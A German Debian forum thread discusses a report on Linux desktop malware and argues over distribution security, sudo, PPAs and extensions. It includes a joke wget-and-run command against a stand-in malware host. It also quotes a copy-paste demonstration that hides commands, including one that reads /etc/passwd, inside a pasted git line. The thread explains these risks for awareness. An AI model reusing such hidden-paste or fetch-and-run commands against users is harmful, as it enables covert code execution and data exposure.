Malware für den Linux-Desktop

Alles rund um sicherheitsrelevante Fragen und Probleme.
debianoli
Beiträge: 4073
Registriert: 07.11.2007 13:58:49
Lizenz eigener Beiträge: MIT Lizenz

Malware für den Linux-Desktop

Beitrag von debianoli » 25.07.2019 09:25:26

Bei Heise gibt es einen Artikel zu Malware für den Linux-Desktop. Recht interessant finde ich die Vermutungen zur Verbreitung:
Wie die Schadprogramme jeweils auf den Rechner kommen, ist nicht bekannt. Es ist gut vorstellbar, dass dies etwa im Rahmen von Spear-Phishing mit ausgefeiltem Social Engineering erfolgt. Denn dagegen sind auch Linux-Nutzer nicht immun.
https://www.heise.de/security/meldung/A ... 78508.html

guennid

Re: Malware für den Linux-Desktop

Beitrag von guennid » 25.07.2019 10:42:39

Wobei man jetzt gerne wüsste, was man sich unter „Spear-Phishing“ und „Social Engineering“ vorzustellen hat. Immerhin geht's um ein Desktop-Problem. Der Schreiber des verlinkten Artikels hält eine Information darob nicht für nötig und verlinkt auch nicht auf eine solche.

Grüße, Günther

Benutzeravatar
kalle123
Beiträge: 2714
Registriert: 28.03.2015 12:27:47
Wohnort: Mönchengladbach

Re: Malware für den Linux-Desktop

Beitrag von kalle123 » 25.07.2019 10:55:00

Wenn ich mich recht erinnere, liegt der Anteil von Linux bei Desktopsystemen doch im niedrigen einstelligen Prozentbreich!?

Also -- no panic :wink:

Gruß KH

Benutzeravatar
MSfree
Beiträge: 10776
Registriert: 25.09.2007 19:59:30

Re: Malware für den Linux-Desktop

Beitrag von MSfree » 25.07.2019 11:19:39

guennid hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 10:42:39
Wobei man jetzt gerne wüsste, was man sich unter „Spear-Phishing“ und „Social Engineering“ vorzustellen hat.
Spear-Phishing
Social Engineering

uname
Beiträge: 12075
Registriert: 03.06.2008 09:33:02

Re: Malware für den Linux-Desktop

Beitrag von uname » 25.07.2019 12:41:31

Wenn ich es richtig verstanden habe, dann ist es kein Linux-Problem. Der Anwender besorgt und installiert sich seine Malware selbst aus irgendeiner unsicheren Quelle.

debianoli
Beiträge: 4073
Registriert: 07.11.2007 13:58:49
Lizenz eigener Beiträge: MIT Lizenz

Re: Malware für den Linux-Desktop

Beitrag von debianoli » 25.07.2019 12:54:44

uname hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 12:41:31
Wenn ich es richtig verstanden habe, dann ist es kein Linux-Problem.
Jain. Bei den geschilderten Fällen ist das Angriffsziel der User-Desktop, nicht das ganze System. Was ja auch Sinn macht, da zB im Bereich Maschinenbau teilweise auf Linux-Rechnern entwickelt wird. Das macht diese Rechner für Industrie-Spionage anfällig.

Ich sehe daher schon ein "Linux"-Problem, da es für Malware-Produzenten inzwischen interessant ist, überhaupt Malware für Desktop-Linux (hier Gnome) zu produzieren. Der Tenor bei vielen von mir verfolgten Diskussionen zu diesem Bereich war immer: " Da muss man nicht aufpassen, Linux am Desktop hat keine Verbreitung. Und das System lässt sich so sowieso nicht kapern." Aber man muss eben schon aufpassen und vorsichtig bleiben. Denn das ein hilfreiches Desktop-Applet für zB eine Wettervorherschau eine Hintertür für böse Buben hat, daran glaubt man manchmal eben nicht. Vor allem, wenn die Empfehlung für das Desktop-Applet von einem "Freund" oder "Bekannten" kommt.

uname
Beiträge: 12075
Registriert: 03.06.2008 09:33:02

Re: Malware für den Linux-Desktop

Beitrag von uname » 25.07.2019 13:01:24

Ich sehe es nicht als Desktop-Problem, wenn der Anwender irgendeine Anwendung an den Paketquellen vorbei installiert. Dass dieses Tool evtl. ein Feature für den Desktop sein sollte ist meiner Meinung nach nur zweitrangig.

Vergleich zu Android:
Bei Android kann man aus unsicheren Quellen APK-Dateien installieren. Aber es ist doch kein Problem des Playstores oder von Android, wenn der Anwender unsichere Quellen aktiviert, sich eine apk-Datei zieht und installiert. Wobei die Apple-Welt sieht gerade die Möglichkeit es zu tun als den Sicherheitsnachteil von Android.

Benutzeravatar
MSfree
Beiträge: 10776
Registriert: 25.09.2007 19:59:30

Re: Malware für den Linux-Desktop

Beitrag von MSfree » 25.07.2019 13:26:29

uname hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 13:01:24
Ich sehe es nicht als Desktop-Problem
Der Desktop ist in diesem Zusammenhank ein nützliches Vehikel. Auf der Kommandozeile muß man sich halt auskennen. Der Desktop erlaubt durch den Bedienkomfort die Installation von Malware mit einem Klick. Von der Kommandozeile fängt sich keiner Malware mit

Code: Alles auswählen

wget https://malware.server.cx/downloads/malware.tgz
tar xvfz malware.tgz
cd malware
./configure
make
make install
malware.sh
ein. :mrgreen:
Wobei die Apple-Welt sieht gerade die Möglichkeit es zu tun als den Sicherheitsnachteil von Android.
Apple behauptet zwar, daß ihr System sicherer sei, dabei gibt es auch im AppStore genug Software, die mit Schnüffelroutinen und Schadsoftware verseucht ist. Das einzige, was Apple bei einer App kontrolliert, ist, ob jemand, der eine App im Store anbieten will, Routinen aufruft, die sie gemäß Apple nicht aufrufen dürfen. Schließlich will Apple 30% Provision für alle App-Verkäufe und alle In-App-Verkäufe und über den finanziellen Teil der App wacht Apple mit Argusaugen.

guennid

Re: Malware für den Linux-Desktop

Beitrag von guennid » 25.07.2019 13:42:43

@MSfree
Danke für die Links!

Nr. 1 wäre also sowas wie auf einen bestimmten Personenkreis gezielte Ausspähung persönlicher IT-Daten (z.B. Passwörter, Bankverbindungen).
Nr. 2 wäre in meinem Verständnis schlicht Manipulation eines Internet-Teilnehmers. Nach meinem Dafürhalten bedarf es dazu keiner (in der Regel kurzlebiger) gesonderten „Herrschaftssprache“. Der Heise-Artikel wäre nur unwesentlich länger geworden.

Grüße, Günther

uname
Beiträge: 12075
Registriert: 03.06.2008 09:33:02

Re: Malware für den Linux-Desktop

Beitrag von uname » 25.07.2019 13:48:34

MSfree hat geschrieben:Der Desktop erlaubt durch den Bedienkomfort die Installation von Malware mit einem Klick.
Muss man den Download nicht noch ausführbar machen oder geht das mittlerweile automatisch?

Idee:
Könnte man nicht /home "noexec" mounten?
Ich denke ein Aufruf von "bash script.sh" wäre weiter möglich, wäre aber wohl auf dem Desktop nicht vorgesehen.
Am Ende liegt es wohl am Anwender.
Nutzt ihr irgendwelche speziellen Konfigurationen z. B. für Bekannte?

debianoli
Beiträge: 4073
Registriert: 07.11.2007 13:58:49
Lizenz eigener Beiträge: MIT Lizenz

Re: Malware für den Linux-Desktop

Beitrag von debianoli » 25.07.2019 14:07:04

uname hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 13:48:34
Am Ende liegt es wohl am Anwender.
Das dürfte das Kernproblem bei gefühlt 90% aller erfolgreichen Malware-Attacken oder bei Phishing sein. Gerade wenn etwas direkt oder scheinbar von bekannten Personen kommt, wird man leichter nachlässig.

Ich selber habe mir zB einmal auf einem Win98-Rechner einen Virus eingefangen: Ein Freund hat mir eine Diskette mit Programm gegeben. Ich hatte ihn gefragt, ob er die Diskette auf Viren geprüft hat. Er hat damals ja gesagt und ich habe die Diskette dann aus Faulheit nicht selber überprüft. Danach hatte ich einen Virus auf dem Rechner.

TomL

Re: Malware für den Linux-Desktop

Beitrag von TomL » 25.07.2019 14:45:28

debianoli hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 12:54:44
Ich sehe daher schon ein "Linux"-Problem, da es für Malware-Produzenten inzwischen interessant ist, überhaupt Malware für Desktop-Linux (hier Gnome) zu produzieren.
debianoli hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 14:07:04
uname hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 13:48:34
Am Ende liegt es wohl am Anwender.
Das dürfte das Kernproblem bei gefühlt 90% aller erfolgreichen Malware-Attacken oder bei Phishing sein. Gerade wenn etwas direkt oder scheinbar von bekannten Personen kommt, wird man leichter nachlässig.
Auf den ersten Blick 2 scheinbar gegensätzliche Aussagen.... aber ich glaube, dass beides zutrifft und beides auch nicht zutrifft. Ich sage hierbei aber nicht Linux, sondern Distribution. Meiner Meinung nach sind private Ubuntu- und Mint-Systeme vermutlich geradezu dazu prädestiniert, Opfer von Schadsoftware zu werden .... Mint noch deutlich mehr, als Ubuntu, weil Mint sich imho als Windows-Alternative geriert und teilweise auch das Verhalten und die Erwartungshaltung der Neuankömmlinge aus der Win-Welt importiert hat. Es gibt imho keinen einfacheren Weg der Kompromittierung solcher Systeme als über diese Flatpaks, Snaps, ppa's, etc. aus anoynmen Quellen. Empfehlungen für irgendwelche ppa' sind da m.M.n. völlig normal. In Verbindung mit sudo stehen da einem Angreifer alle Möglichkeiten ungebremst zur Verfügung. All das ist bei Debian aber im Regelfall total unüblich, hier wird zumeist von sudo abgeraten und Empfehlungen für fremde Paketquellen findet man hier überhaupt nicht, sondern regelmäßig nur Verweise aufs eigene Repo und allenfalls die Backports.... aber immer im selben Haus verbleibend.

So einfach, wie es ist, ein Ubuntu oder Mint auch einschließlich der System-Binaries zu übernehmen, so bin ich davon überzeugt, dass das bei einem Debian nicht so schnell möglich ist.... der Schaden bei Debian bleibt imho aufs Homedir begrenzt. Und da ist die Lösung, das Homedir einfach umbennennen, neu anmelden, und die Zecke ist quasi isoliert. Hats hingegen Zugriff durch die Maleware auf /usr oder /opt gegeben, sieht die Welt ganz anders aus. Aber das verhindert Debian eigentlich doch schon ganz gut, weils schon beim Installer zwischen user und admin deutlich unterscheidet und damit vorsieht, dass sich der user unter seiner UID keine höheren Rechte aneignen kann.... was allerdings der "berechtigte" User natürlich wieder sabotieren kann. Ich glaube, bei U + M ist es eher die Distribution, die es dem Angreifer leicht macht, bei D isses der Anwender, der die Default-Features umgehen oder außer Kraft setzen muss.Darüber hinaus schätze ich die Debian-Anwender als gravierend weniger fahrlässig ein und auf der anderern Seite auch deutlich sachkundiger. Also meiner Meinung nach, nicht pauschal Linux, sondern einige Distributionen werden härter getroffen, als andere... und mit Debian ist es imho leicht, allen Einschlägen erfolgreich aus dem Weg zu gehen.

jm2c

Benutzeravatar
hikaru
Moderator
Beiträge: 13593
Registriert: 09.04.2008 12:48:59

Re: Malware für den Linux-Desktop

Beitrag von hikaru » 25.07.2019 15:26:20

MSfree hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 13:26:29
Von der Kommandozeile fängt sich keiner Malware mit

Code: Alles auswählen

wget https://malware.server.cx/downloads/malware.tgz
tar xvfz malware.tgz
cd malware
./configure
make
make install
malware.sh
ein. :mrgreen:
Soso:
http://thejh.net/misc/website-terminal-copy-paste
;)

debianoli
Beiträge: 4073
Registriert: 07.11.2007 13:58:49
Lizenz eigener Beiträge: MIT Lizenz

Re: Malware für den Linux-Desktop

Beitrag von debianoli » 25.07.2019 15:31:36

TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 14:45:28
... dass das bei einem Debian nicht so schnell möglich ist.... der Schaden bei Debian bleibt imho aufs Homedir begrenzt. Und da ist die Lösung, das Homedir einfach umbennennen, neu anmelden, und die Zecke ist quasi isoliert.
Das ist aber gar nicht der Sinn der geschilderten Malware. Die wollen nur an die Daten von $home und an Passwörter. Das geht wohl per Gnome-Widget und Keylogger. Und bei Verwendung eines Mail-Programms ist der Inhalt von $home sehr wohl mehr als interessant, denn dort stehen meist Firmeninterna.

Und wenn man gar nicht bemerkt, dass man sich Malware eingefangen hat, dann benennt man auch kein User-Home um.
Zuletzt geändert von debianoli am 25.07.2019 15:32:17, insgesamt 1-mal geändert.

Benutzeravatar
Ibex
Beiträge: 319
Registriert: 25.07.2008 20:54:19

Re: Malware für den Linux-Desktop

Beitrag von Ibex » 25.07.2019 15:32:02

TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 14:45:28

So einfach, wie es ist, ein Ubuntu oder Mint auch einschließlich der System-Binaries zu übernehmen, so bin ich davon überzeugt, dass das bei einem Debian nicht so schnell möglich ist....
Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.

Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.

Auch unter Debian kann man ein .deb herunterladen und installieren, oder fremde Repositorien einbinden. Oder eben eine "praktische" Gnome Extension installieren. Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich. Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.

Grade vor dem Beispiel Gnome extentsion würde ich mich selbst auch nicht grundsätzlich ausnehmen (davon abgesehen das ich kein Gnome nutze). Diese extension sind ja wohl gerade darauf ausgelegt, den Desktop um neue, zusätzliche Funktionen zu erweitern, und sicher in der Regel nicht in den Debian paketquellen. Ich würde nicht ausschließen, selbst soetwas zu installieren, wenn die funktion praktisch ist und mir die Quelle seriös vorkommt, und vielleicht noch von einem Freund oder in einem Debian Wiki empfohlen wird. Extensions nutze ich auch bei firefox, in der Regel auch mit aktivierten automatischen Updates, oft sind sie einfach zu praktisch um ständig Sicherheitsbedenken vor sich her zu tragen. Zwar "nur" im user Kontext, aber da liegen auch alle meinen sensiblen Daten.

Benutzeravatar
MSfree
Beiträge: 10776
Registriert: 25.09.2007 19:59:30

Re: Malware für den Linux-Desktop

Beitrag von MSfree » 25.07.2019 15:40:48

hikaru hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:26:20
Soso:
http://thejh.net/misc/website-terminal-copy-paste ;)
Die Methode, so geschickt, wie sie ist, funktioniert auf der Konsole nicht. Kein X11, kein Copy'n'Paste. :mrgreen:

TomL

Re: Malware für den Linux-Desktop

Beitrag von TomL » 25.07.2019 17:25:28

Ibex hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:32:02
Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.
Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.
Dem ersten Satz stimme ich nicht zu.... denn die unter Ubuntu und Mint präferierte Administrations-Methode ist technisch begründbar eindeutig mehr Malware begünstigend, als es das unter Debian ist. Aber ja, es stimmt, Debian scheint in der tradionell verbreiteten Meinung weniger Einsteigerfreundlich zu sein... aber es ist tatsächlich nur dem Schein nach so. Ich habe bereits mehrere Anfänger-Systeme mit dem NonFree-Netinst-Iso eingerichtet, und die wurden im Nachgang von vorurteilsfreien Umsteigern nie als Einsteigerunfreundlich beurteilt. Im Gegenteil, "wow, so einfach geht das?", war eher mehrheitlich die Meinung.
Auch unter Debian kann man ein .deb herunterladen und installieren, oder fremde Repositorien einbinden.

Ich habe nie die Möglichkeit infrage gestellt, natürlich geht das mit Debian auch..... nur liegt der massgebliche Unterschied meiner Meinung nach im Sprachgebrauch oder in der Sichtweise dieses Forums bzw. der erfahrenen Debian-Anwender, die solche Aktionen in meiner Erinnerung fast immer ablehnen und davon abraten. Aber natürlich ist es auch hier so, keine Regel ohne Ausnahme.... die Palemoon-Nutzer werden wohl zumeist ein aktuelles Paket selber direkt von der Project-Seite runterladen.... keine Ahnung, ob jemand tatsächlich das Repo eingetragen hat, ich habs jedenfalls nicht. Es wird wohl auch noch anderen Ausnahmen geben, aber das sich solche Ausnahmen als Empfehlungen allgemein etabliert haben, ist mir jedenfalls so nicht bewusst.
Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich.
Nun ja, dieser Satz ist bei Vorhandensein einer sudo-Default-Konfiguration -wie oben schon erwähnt- eindeutig technisch widerlegbar, da besteht nämlich ein großer Unterschied. Und bei Umsteigern/Einsteigern als Zielgruppe kann man wohl von einer Default-Konfiguration ausgehen.
Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.
Ich würde das so formulieren: Debian unterstützt den erfahreneren Anwender darin, sein System zu schützen. Die zwei anderen von mir genannten Distributionen unterstützen den Umsteigeprozess von Windows und neutralisieren damit teilweise das linuxeigene Immunsystem.... letztlich zum Nachteil des Anwenders, wenn sich das mit spezieller Linux-Malware wirklich mal im großen Stil durchsetzen wird.

TomL

Re: Malware für den Linux-Desktop

Beitrag von TomL » 25.07.2019 17:39:55

debianoli hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:31:36
Das ist aber gar nicht der Sinn der geschilderten Malware. Die wollen nur an die Daten von $home und an Passwörter.
Ich unterscheide das nicht.... weder die Intention eines solchen Programms, noch die Quelle oder der Einsatzort des Programms auf dem Rechner, noch die Motivation der Programmierer haben für mich irgendeine Bedeutung. Für mich ist jegliche Software (außerhalb des Setups durch den Installer) eine Schadsoftware, die ich nicht selber bewusst und vorsätzlich installiert habe. Völlig egal, ob das ein Shellscript ist, eine GUI-Extension, ein Plugin irgendeines Programms, ein Addon oder ein Binary ist. Mir ist auch gleichgültig, welche Daten im Fokus dieser Schadsoftware stehen, ob es nur lesen will oder verschlüsseln oder zerstören... macht für mich alles keinen Unterschied. Ich habe alles mir (!) mögliche an Vorkehrungen getroffen, dass meine Anwender keinen fremde Software starten können, die ich nicht installiert habe. Dabei ist mir klar, für viele der Mitglieder aus dem Forum wären das keine Hürden, für meine Anwender sind die ohne äußere Hilfe jedoch unüberwindbar.

DeletedUserReAsG

Re: Malware für den Linux-Desktop

Beitrag von DeletedUserReAsG » 25.07.2019 18:55:23

MSfree hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:40:48
hikaru hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:26:20
Soso:
http://thejh.net/misc/website-terminal-copy-paste ;)
Die Methode, so geschickt, wie sie ist, funktioniert auf der Konsole nicht. Kein X11, kein Copy'n'Paste. :mrgreen:
Debiangpm ermöglicht das auch ohne X11.

Benutzeravatar
MSfree
Beiträge: 10776
Registriert: 25.09.2007 19:59:30

Re: Malware für den Linux-Desktop

Beitrag von MSfree » 25.07.2019 19:16:53

niemand hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 18:55:23
Debiangpm ermöglicht das auch ohne X11.
Jetzt fragt sich nur, aus welchem Browser du den Text kopieren willst. Ohne X11 kein Firefox, Chromium...
Lynx zeigt die Seite http://thejh.net/misc/website-terminal-copy-paste übrigens so an:

Code: Alles auswählen

←←←                                                                                  Copy-Paste from Website to Terminal
   You surely know this: You're looking at some website with some useful shell commands. However, those commands
   are long as hell and you know you're probably not gonna need them for a few years or so (so there's no need to
   memorize them). So, what do you do? You copy-paste them. Here's an example:

   git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy
   code from websites you don'"'"'t trust!
   Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
   git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

   Try running this command in your terminal. It's supposed to be harmless, right? It is harmless, yes, but what
   happens still isn't what you'd expect and demonstrates the dangers in doing stuff like that. Mark it with your
   mouse, copy it somehow (e.g. using CTRL+C) and paste it into a terminal. What happens?

   There are some good comments and suggestions on how you can mitigate this kind of attack on reddit and Hacker
   News. [DEL: Also, oh-my-zsh now includes a fix for this issue (which relies on Bracketed Paste Mode support in
   the terminal). :DEL] Oh, and it seems that other people wrote a detailed text about this issue in 2008.

   Please note that Bracketed Paste Mode DOES NOT always fix this because the end sequence can be inside the text
   you paste unless your terminal emulator filters out the bracketed paste characters when pasting! For those of
   you who have installed the oh-my-zsh stuff, the following variant (which includes an escape sequence) might
   still work against you:

   git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea.
   Don'"'"'t copy code from websites you don'"'"'t trust!
   Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
   git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
Da gibt es dieses WYSINWYC (What you see is not what you copy) also nicht.

DeletedUserReAsG

Re: Malware für den Linux-Desktop

Beitrag von DeletedUserReAsG » 25.07.2019 19:59:54

MSfree hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 19:16:53
Jetzt fragt sich nur, aus welchem Browser du den Text kopieren willst. Ohne X11 kein Firefox, Chromium...
Debianlinks2 fiele mir ein. In meiner Erinnerung existiert noch ein curses-Browser, der sogar CSS/JS (im Rahmen der Möglichkeiten eines Terminals, natürlich) verarbeiten kann. Komme aber gerade nicht auf den Namen.

Benutzeravatar
Ibex
Beiträge: 319
Registriert: 25.07.2008 20:54:19

Re: Malware für den Linux-Desktop

Beitrag von Ibex » 26.07.2019 12:45:06

TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 17:25:28
Ibex hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:32:02
Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.
Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.
Aber ja, es stimmt, Debian scheint in der tradionell verbreiteten Meinung weniger Einsteigerfreundlich zu sein... aber es ist tatsächlich nur dem Schein nach so. Ich habe bereits mehrere Anfänger-Systeme mit dem NonFree-Netinst-Iso eingerichtet, und die wurden im Nachgang von vorurteilsfreien Umsteigern nie als Einsteigerunfreundlich beurteilt.
Einmal eingerichtet wüsste ich auch nicht warum man Debian als weniger einsteigerfreundlich ansehen soll, aber die Ertsteinrichtung ist eben etwas aufwendiger.
TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 17:25:28
Dem ersten Satz stimme ich nicht zu.... denn die unter Ubuntu und Mint präferierte Administrations-Methode ist technisch begründbar eindeutig mehr Malware begünstigend, als es das unter Debian ist.
Du beziehst Dich jetzt auf die Art wie sudo bei Ubuntu benutzt wird? Oder hast du noch andere Kritikpunkte? Zu sudo bei Ubuntu gibt es ja schon ellenlange Diskussionen, ich halte das jetzt nicht für so ein riesen Problem, weiß aber das es andere Ansichten gibt.

Ich bleibe aber dabei das es weniger die Technik als die Kultur ist. Bei Ubuntu wird Dir in den meisten Wikis schon auf Seite 3 das erste ppa für aktuellere Software empfohlen, das findet man bei Debian kaum. Aber wirklich wirksame Schutzmechanismen gegen die Installation aus Fremdquellen sehe ich bei Debian auch nicht.

Snap/flatpaks sind noch mal eine andere Sache, das macht es noch mal einfacher, sich problematische Software mit einem klick zu installieren, vor allem ist es aber auch hier wieder die Gewohnheit, sich Software aus allen mögliche Quellen zusammenzusuchen, die unterstützt wir und die problematisch ist.
TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 17:25:28
Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich.
Nun ja, dieser Satz ist bei Vorhandensein einer sudo-Default-Konfiguration -wie oben schon erwähnt- eindeutig technisch widerlegbar, da besteht nämlich ein großer Unterschied.
Jetzt muss ich doch noch mal zu einem link zu einem entsprechenden technischen Beleg fragen, du klingst so überzeugt davon.

TomL hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 17:25:28
Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.
Ich würde das so formulieren: Debian unterstützt den erfahreneren Anwender darin, sein System zu schützen. Die zwei anderen von mir genannten Distributionen unterstützen den Umsteigeprozess von Windows und neutralisieren damit teilweise das linuxeigene Immunsystem.... letztlich zum Nachteil des Anwenders, wenn sich das mit spezieller Linux-Malware wirklich mal im großen Stil durchsetzen wird.
Wie gesagt, das Linux eigene Immunsystem zu erkenne fällt mir schwer. Ubuntu und Mint unterstützen aber die "Windows Denkweise" bei der Installation von Software, was bei einer stärkeren Verbreitung zwangsweise zu ähnlichen Sicherheitsproblemen wie bei Windows führen wird.

TomL

Re: Malware für den Linux-Desktop

Beitrag von TomL » 26.07.2019 14:25:27

Ibex hat geschrieben: ↑ zum Beitrag ↑
26.07.2019 12:45:06
Jetzt muss ich doch noch mal zu einem link zu einem entsprechenden technischen Beleg fragen, du klingst so überzeugt davon.
Gerne, hast Du bekommen....
Ibex hat geschrieben: ↑ zum Beitrag ↑
26.07.2019 12:45:06
Wie gesagt, das Linux eigene Immunsystem zu erkenne fällt mir schwer.
Soweit es Debian angeht, ist das für mich leicht erkennbar: Im Default-Ergebnis des Debian-Installers kann sich der Installer-User (UID 1000) anschließend und im Normalbetrieb des Systems keine unter seiner UID wirksamen Rechte aneignen, die über seine eigenen Rechte hinausgehen, um z.B. das System unter seiner UID und dem eigenen Password zu veränden. Das ist der historischen Linie folgend, dass nur root das Recht hat, Änderungen am System oder an Berechtigungen vorzunehmen... und das ist für mich das wirkungsvollste Immunsystem überhaupt. U + M haben allerdings genau das neutralisiert, der Anwender kann unter seiner UID und mit seinem eigenen Password durch eine völlig missbräuchliche Verwendung von "sudo" nicht nur Berechtigungen ändern, sondern er kann sogar das System als solches verändern. Da aber genau das aufs einfachste bei Angriffen missbraucht werden kann, haben diese Systeme in meiner Sichtweise keinerlei Immunsystem mehr.

Das kann man auch eigentlch nicht anders sehen, weil man dann meiner Meinung nach einfach die Fakten verleugnet...... :roll:
Ibex hat geschrieben: ↑ zum Beitrag ↑
26.07.2019 12:45:06
Ubuntu und Mint unterstützen aber die "Windows Denkweise" bei der Installation von Software, was bei einer stärkeren Verbreitung zwangsweise zu ähnlichen Sicherheitsproblemen wie bei Windows führen wird.
Da sind wir vollkommen einer Meinung. Im empfinde es nur als irritierend, dass U + M die seit über einem Jahrzehnt bei Windows bekannten Fehler wiederholen wollen.... mit den bei der Konkurrenz abgeschauten Erfahrungen hätte man es allemal besser machen können.

debianuser4782
Beiträge: 196
Registriert: 11.03.2018 23:09:05

Re: Malware für den Linux-Desktop

Beitrag von debianuser4782 » 26.07.2019 17:57:00

MSfree hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:40:48
hikaru hat geschrieben: ↑ zum Beitrag ↑
25.07.2019 15:26:20
Soso:
http://thejh.net/misc/website-terminal-copy-paste ;)
Die Methode, so geschickt, wie sie ist, funktioniert auf der Konsole nicht. Kein X11, kein Copy'n'Paste. :mrgreen:
Ich benutze derzeit das default-Terminal in Openbox "xterm". Dort ist cp nicht möglich. Das sah ich als Beschneidung einer Angewohnheit von mir, welche ich zB mit "lxterminal" eingübt hatte. Nun sehe ich die fehlende Funktion vor den hiesigen Informationen aber als vorteilhaft an. Zudem hatte ich zeitweise mein root- und user-Passwort über cp ins terminal eingefügt. Insbesondere diese Passwörter haben aber in der Zwischenablage nichts verloren, wie ich nun meine.

Derzeit Frage ich mich, warum man in die root- und user-Passwörter in Linux keine PINs - zB mit virtueller Tastatur - einbauen kann.

Also zB an 3. 8. 12. und 16. Stelle im Paswort verteile ich eine 4-Stellige alphanumerische PIN mit einem Sonderzeichen. Meine Ausdrucksweise für eine PIN, die da zB lautet "P6f+" verteile ich auf die Passwortstellen ( 3.8.12.16). Das wäre bei einem Passwort mit 21 Stellen dann: xxxPxxxxx6xxxxfxxxx+xxxxx.
Ich würde gerne wissen, warum das in Linux nicht funktionieren kann. Weiß da jemand mehr?
Das wäre aber eventuell bereits Stoff für einen separaten Thread.

TomL

Re: Malware für den Linux-Desktop

Beitrag von TomL » 26.07.2019 18:26:33

Ich versuche gerade zu verstehen, was Du sagen möchtest..... gar nicht mal so einfach.... :roll:
debianuser4782 hat geschrieben: ↑ zum Beitrag ↑
26.07.2019 17:57:00
Ich benutze derzeit das default-Terminal in Openbox "xterm". Dort ist cp nicht möglich.
Doch, natürlich funktioniert das auch auch, nur etwas anders... Middle-Click oder Shift-Insert fügen aus dem Clipboard ein.
Also zB an 3. 8. 12. und 16. Stelle im Paswort verteile ich eine 4-Stellige alphanumerische PIN mit einem Sonderzeichen. Meine Ausdrucksweise für eine PIN, die da zB lautet "P6f+" verteile ich auf die Passwortstellen ( 3.8.12.16). Das wäre bei einem Passwort mit 21 Stellen dann: xxxPxxxxx6xxxxfxxxx+xxxxx.
Warum soll das nicht funktionieren? Du kannst Dir doch ein beliebiges Password ausdenken und dann an die genannten Stellen irgendwas einfügen.... was hindert Dich daran, das so zu tun...?.... dann ist es eben ein um 4 Stellen längeres Password, also ohne die Einfügungen. Du bist doch eigentlich ziemlich frei in Deiner Password-Gestaltung.
Ich würde gerne wissen, warum das in Linux nicht funktionieren kann. Weiß da jemand mehr?
Stellst Du Dir dabei eine Unterstützung durch Debian vor? Wie sollte die aussehen? Oder was genau funktioniert da nicht?

Antworten